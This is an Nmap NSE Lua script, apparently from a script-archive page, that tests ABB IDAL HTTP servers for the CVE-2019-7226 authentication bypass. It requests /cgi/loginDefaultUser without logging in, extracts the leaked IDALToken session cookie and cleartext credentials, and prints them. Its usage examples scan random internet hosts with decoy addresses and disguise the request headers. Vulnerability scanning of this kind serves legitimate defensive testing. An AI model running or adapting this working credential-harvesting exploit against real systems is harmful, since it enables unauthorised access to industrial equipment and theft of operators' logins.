Script Source
Toggle
The full script source is stored with this entry and is hidden by default to keep
the page easier to scan.
---
-- Nmap NSE abb-cve-2019-7226.nse - Version 1.10
-- Copy to: /usr/share/nmap/scripts/abb-cve-2019-7226.nse
-- Update NSE database: sudo nmap --script-updatedb
-- execute: nmap --script-help abb-cve-2019-7226.nse
-- Port(s) accepted by this nse: 80-86,8080-8086
---
-- SCRIPT BANNER DESCRIPTION --
description = [[
Module Author: r00t-3xp10it {Disclosure = Eldar Marcussen}
NSE script to detect if target [ip]:[port][/url] its affected by CVE-2019-7226 (Improper Authentication)
The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass authentication
and gain access to privileged functions. Specifically, /cgi/loginDefaultUser creates a session in an authenticated state
and returns the session ID along with what may be the username and cleartext password of the user. An attacker can then
supply an IDALToken value in a cookie, which will allow them to perform privileged operations such as restarting the service
with /cgi/restart.
Some Syntax examples:
nmap --script-help abb-cve-2019-7226.nse
nmap -sV -T4 -Pn -n -p 80-86,8080 --open --script abb-cve-2019-7226.nse 137.44.25.194
nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" 137.44.25.194
nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "uri=/vdeo/cgi/loginDefaultUser,verbose=true" 137.44.25.194
nmap -sS -Pn -p 80,86 --open --script abb-cve-2019-7226.nse --script-args "User-Agent=Apache-HttpClient/4.0.3,verbose=true" 50.117.40.77
nmap -sS -v -Pn -n -T4 -iR 700 -p 80-86,8080-8086 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" -D 65.49.82.3
]]
---
-- @usage
-- nmap --script-help abb-cve-2019-7226.nse
-- nmap -sV -T4 -Pn -n -p 80-86,8080 --open --script abb-cve-2019-7226.nse 137.44.25.194
-- nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" 137.44.25.194
-- nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "uri=/vdeo/cgi/loginDefaultUser,verbose=true" 137.44.25.194
-- nmap -sS -Pn -p 80,86 --open --script abb-cve-2019-7226.nse --script-args "User-Agent=Apache-HttpClient/4.0.3,verbose=true" 50.117.40.77
-- nmap -sS -v -Pn -n -T4 -iR 700 -p 80-86,8080-8086 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" -D 65.49.82.3
-- @output
-- PORT STATE SERVICE VERSION
-- 80/tcp open http Apache httpd 2.4.38
-- | abb-cve-2019-7226:
-- | VULNERABLE:
-- | ABB IDAL HTTP server CGI (Improper Authentication)
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2019-7226
-- | Risk factor: Higth CVSSv2: 8.8 HIGH (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
-- | The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass
-- | authentication and gain access to privileged functions. Specifically, /cgi/loginDefaultUser creates a session
-- | in an authenticated state and returns the session ID along with what may be the username and cleartext password
-- | of the user. An attacker can then supply an IDALToken value in a cookie, which will allow them to perform privileged
-- | operations such as restarting the service with /cgi/restart. A GET request to /cgi/loginDefaultUser may result in
-- | '1 #S_OK IDALToken=532c8632b86694f0232a68a0897a145c admin admin' or a similar response.
-- |
-- | Disclosure date: 2019-Fev-04
-- | Exploit results:
-- | Uri: http://192.168.1.71:80/cgi/loginDefaultUser
-- | Auth-Cookie: IDALToken=008b1047k72068r6100a69b0381d007p
-- | Credentials: admin : MyS3cr3t
-- |
-- | Referencies:
-- | https://nvd.nist.gov/vuln/detail/CVE-2019-7226
-- | https://www.akaoma.com/ressources/cve/gain-privilege/cve-2019-7226
-- | https://packetstormsecurity.com/files/153402/ABB-IDAL-HTTP-Server-Authentication-Bypass.html
-- |_
-- @args verbose => Display More verbose outputs - Default: false
-- @args User-Agent => User-Agent to send in requests - Default: iPhone,safari
-- @args uri => the URL path to search in host.ip - Default: /cgi/loginDefaultUser
---
author = "r00t-3xp10it"
copyright = "Eldar Marcussen"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"safe", "vuln"}
-- DEPENDENCIES (lua nse libs) --
local http = require "http"
local table = require "table"
local vulns = require "vulns"
local string = require "string"
local stdnse = require "stdnse" --> nse args usage
local shortport = require "shortport"
-- THE RULE SECTION --
-- Scan only the selected ports/proto/service_names in 'open state'
portrule = shortport.port_or_service({80, 81, 82, 83, 84, 85, 86, 8080, 8081, 8082, 8083, 8084, 8085, 8086}, "http, http-simple-new, http-proxy", "tcp", "open")
-- THE ACTION SECTION --
action = function(host, port)
local verbose = stdnse.get_script_args(SCRIPT_NAME..".verbose") or "false"
local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/cgi/loginDefaultUser"
-- Manipulate TCP packet 'header' with false information about attacker :D
local _decoy = {header={}} --> manipulate 'header' request ..
_decoy['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".User-Agent") or "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1" --> use iPhone,safari User-agent OR your own...
_decoy['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" --> use en-GB as attacker default install language
_decoy['header']['Cache-Control'] = "no-store" --> Instruct webserver to not write it to disk (do not to cache it)
-- Identify servers that answer [200] to invalid HTTP requests
-- and exit them (abort exec) as these would invalidate the tests.
local status_404, result_404, _ = http.identify_404(host, port)
if ( status_404 and result_404 == 200 ) then
print("CVE-2019-7226:\n| Exiting: "..host.ip..":"..port.number..uri.." (false positive)\n| Reason: All URIs tested return status [200] OK\n|_")
return nil
end
-- Make sure that uri respondes with 200 [OK] { no redirection | no_cache | no_cache_body }
-- [001] importante check to be abble to classify host.ip as state.vulnerable
local response = http.get(host, port, uri, _decoy, { redirect_ok = false, no_cache = true, no_cache_body = true })
if ( not(response or response.status) ) then
uri_found = "false"
elseif (response.status == 200 or response.status == 401 or response.status == 403 or response.status == 405 or response.status == 500) then
uri_found = "true"
else
uri_found = "false"
end
-- Make sure auth cookie exists in response.body {table}
-- Condition that show us that Server its leaking creds (auth cookie).
-- [002] importante check to be abble to classify host.ip as state.vulnerable
index = 1
local tbl = {}
local auth_stats = "false"
local token, cookie_value, capt_creds
if (response and response.body) then
if (string.find(response.body, "IDALToken=")) then
-- convert string (response.body) to table indexing[1] each token
for token in string.gmatch(response.body, "[^%s]+") do
tbl[index] = token
index = index + 1 --> asign to each token an index number
end
auth_stats = "true"
-- concaternate {table} index's values { tbl[3], tbl[4], tbl[5] }
-- and store them inside local variables to be called further ahead.
if ( #tbl == 5 and string.find(tbl[3], "IDALToken=") ) then
cookie_value = tbl[3]
capt_creds = tbl[4].." : "..tbl[5]
elseif ( #tbl<5 and string.find(tbl[3], "IDALToken=") ) then
cookie_value = tbl[3]
capt_creds = "error retrieving table index's"
elseif ( #tbl<3 or #tbl>5 ) then
cookie_value = "error retriving table index's"
capt_creds = "error retrieving table index's"
end
elseif (string.find(response.body, "#E_NEED_LOGIN")) then
auth_stats = "Authentication required"
elseif (response.status == 401 or response.status == 403) then
auth_stats = "Unauthorized/Forbidden"
else
auth_stats = "false"
end
else
auth_stats = "false"
end
-- Build Nmap vulnerable {table}
local vuln_table = {
title = "ABB IDAL HTTP server CGI (Improper Authentication)",
state = vulns.STATE.NOT_VULN,
IDS = {CVE = 'CVE-2019-7226'},
risk_factor = "High",
scores = {
CVSSv2 = "8.8 HIGH (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)",
},
description = [[
The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass
authentication and gain access to privileged functions. Specifically, /cgi/loginDefaultUser creates a session
in an authenticated state and returns the session ID along with what may be the username and cleartext password
of the user. An attacker can then supply an IDALToken value in a cookie, which will allow them to perform privileged
operations such as restarting the service with /cgi/restart. A GET request to /cgi/loginDefaultUser may result in
'1 #S_OK IDALToken=532c8632b86694f0232a68a0897a145c admin admin' or a similar response.
]],
references = {
'https://nvd.nist.gov/vuln/detail/CVE-2019-7226',
'https://packetstormsecurity.com/files/153402/ABB-IDAL-HTTP-Server-Authentication-Bypass.html',
},
dates = {
disclosure = {year = '2019', month = 'Fev', day = '04'},
},
exploit_results = {}, --> Display auth cookie and creds
}
-- Build vulnerable stdout (Display auth cookie and creds)
if (uri_found == "true" and auth_stats == "true") then
table.insert(vuln_table.exploit_results, string.format("Uri: http://"..host.ip..":"..port.number..uri))
table.insert(vuln_table.exploit_results, string.format("Auth-Cookie: "..cookie_value))
table.insert(vuln_table.exploit_results, string.format("Credentials: "..capt_creds.."\n"))
end
-- Final checks (uri_found|auth_stats)
if (uri_found == "false" and verbose == "true") then
return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: [404] Uri Not Found in Response\n\n"
elseif (auth_stats == "false" and verbose == "true") then
return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: ["..response.status.."] Auth Cookie Not found\n\n"
elseif (auth_stats == "Unauthorized/Forbidden" and verbose == "true") then
return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: ["..response.status.."] Unauthorized/Forbidden\n Uri: http://"..host.ip..":"..port.number..uri.."\n\n"..response.body.."\n\n"
elseif (auth_stats == "Authentication required" and verbose == "true") then
return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: ["..response.status.."] Authentication required\n Uri: http://"..host.ip..":"..port.number..uri.."\n\n"..response.body.."\n\n"
elseif ( not(response.body) ) then
if (verbose == "true") then return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: ["..response.status.."] None response.body returned\n Uri: http://"..host.ip..":"..port.number..uri.."\n\n" end
-- We have reached The ['vulnerable_target'] == All [2] importante tests have succeded ..
elseif (uri_found == "true" and auth_stats == "true") then
vuln_table.state = vulns.STATE.VULN
local report = vulns.Report:new(SCRIPT_NAME, host, port)
return report:make_output(vuln_table)
end
end
